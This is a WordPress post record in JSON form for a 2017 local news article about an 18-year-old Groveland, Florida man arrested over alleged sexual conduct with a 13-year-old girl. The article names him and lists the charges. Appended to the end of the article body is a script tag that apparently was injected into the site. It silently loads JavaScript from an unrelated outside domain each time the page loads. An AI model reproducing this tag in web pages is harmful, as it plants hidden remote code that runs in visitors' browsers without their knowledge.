{"id":212238,"date":"2017-06-17T07:53:25","date_gmt":"2017-06-17T11:53:25","guid":{"rendered":"https:\/\/wordpress-1.tempurl.host\/?p=212238"},"modified":"2018-01-23T16:03:10","modified_gmt":"2018-01-23T21:03:10","slug":"man-accused-sex-teen-arrested","status":"publish","type":"post","link":"https:\/\/thegraphicgeek.com\/demo-cflwire\/man-accused-sex-teen-arrested\/","title":{"rendered":"Man Accused of Having Sex with Teen Arrested"},"content":{"rendered":"<p><strong>GROVELAND, Fla. &#8211;\u00a0<\/strong>A Groveland man was arrested after allegedly having sex with a 13-year-old girl according to Lake County Sheriff&#8217;s Office arrest reports.<\/p>\n<p>Deputies responded to a home in Groveland at 4:50 am Thursday morning after receiving a call from the victim&#8217;s grandfather stating that he had woken up to find his granddaughter missing from her bedroom.<\/p>\n<p>The caller stated that he found the victim in the back seat of a disabled vehicle on the property along with 18-year-old Jerimiah Avant.<\/p>\n<p>According to the report, when found, Avant and the victim were both &#8220;unclothed&#8221;.<\/p>\n<p>The victim&#8217;s grandfather told deputies that he believed the two were having sex judging by the way Avant was moving.<\/p>\n<p>The victim&#8217;s mother stated that her daughter had been staying at her grandfather&#8217;s house in an effort to keep her away from Avant.<\/p>\n<p>Avant reportedly lived near the mother&#8217;s house and would come by and see the victim even after being told by her parents to stay away from her, according to the victim&#8217;s mother.<\/p>\n<p>When questioned, Avant denied having sex with the minor and stated that he only came over after he received a text message from the victim.<\/p>\n<p>Avant also admitted to bringing marijuana with him to smoke with the teen. He also told deputies that the victim told him she was fifteen years old.<\/p>\n<p>Avant was arrested and charged with lewd and lascivious conduct on a person under 16-years-old, traveling to meet a minor to commit and an\u00a0unlawful sex act, and delivery of marijuana to a minor less than 18-years-old.<\/p>\n<p>He was transported to the Lake County Jail where he is currently being held in lieu of a $30,000 bond.<\/p>\n<p>Avant is scheduled to appear in court on July 10.<script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>GROVELAND, Fla. &#8211;\u00a0A Groveland man was arrested after allegedly having sex with a 13-year-old girl according to Lake County Sheriff&#8217;s Office arrest reports.
